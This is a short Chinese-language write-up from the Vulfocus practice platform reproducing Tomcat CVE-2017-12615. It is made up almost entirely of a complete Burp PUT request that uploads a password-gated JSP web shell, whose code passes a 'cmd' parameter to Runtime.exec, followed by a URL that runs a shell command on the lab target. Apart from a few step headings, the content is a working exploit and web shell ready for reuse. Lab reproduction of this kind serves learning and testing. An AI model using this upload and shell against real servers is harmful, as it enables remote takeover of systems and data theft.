【Vulfocus漏洞复现】tomcat-cve_2017_12615

访问目标

http://123.58.236.76:15450/

burp抓包

修改请求方式为PUT，增加POST请求体

PUT /shell.jsp/ HTTP/1.1
Host: 123.58.236.76:15450
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XSRF-TOKEN=eyJpdiI6IlUzNGxjL1NvSjdQTzRWMjd1dVNvNHc9PSIsInZhbHVlIjoiNXlRQUpFWTlYek9CTnVkSmk4bzZza05QL3JLNTI4eHJYNHlDaWpsV0lLbjJkYXJpbFJjSXZvUFZYTDQzeTdLZTg1cFc2TmV0OUY0UWVIaXlrZGEwc3dTc3gyaWxtTjJ5eVE1ZVN1TEZ3WFhSbVd1NXVVOE45SUxOQldjM3Z0QTciLCJtYWMiOiI4YzdjMjZmYWM3OGJhNTczZTMxMTUwODY5MGU3YTIzNDRiYjhhYmM5ZDNmNzNjNjFkMjgzMTgzMzVhMDRlMmZjIn0%3D; laravel_session=eyJpdiI6ImFCZS85SDczQXBwL1ZwUFJHUE0veEE9PSIsInZhbHVlIjoic082eUJBSFZrQ2NsOXRxakt6MkVLT0Y5Vk1SbnFDYlJNNkwwSWdpNGhycDN3ejYvaTE4WjBhMThlQnBUTWkwN2RSY3pXZXQwZlNXRTZsVW5OMW0yRmErZGVmeitYYktUbFA1QWhFN1hSMDZGTEJGVURhYlUxczBBbTRKY3hwWUwiLCJtYWMiOiJkYThhN2RmOGRiZjBjZjc1ZTBlNTM4MTQyZmUxOTcyMDllZDM0OTEzZDYxOWY3NzdjNmE1MzcyMTgyYjE0ZmFkIn0%3D; JSESSIONID=3D9771B252C8900C7201D5D0100C59ED
Connection: close

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("
");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("
");
    } 
%>

直接远程命令执行

http://123.58.236.76:15450/shell.jsp?pwd=123&cmd=ls /tmp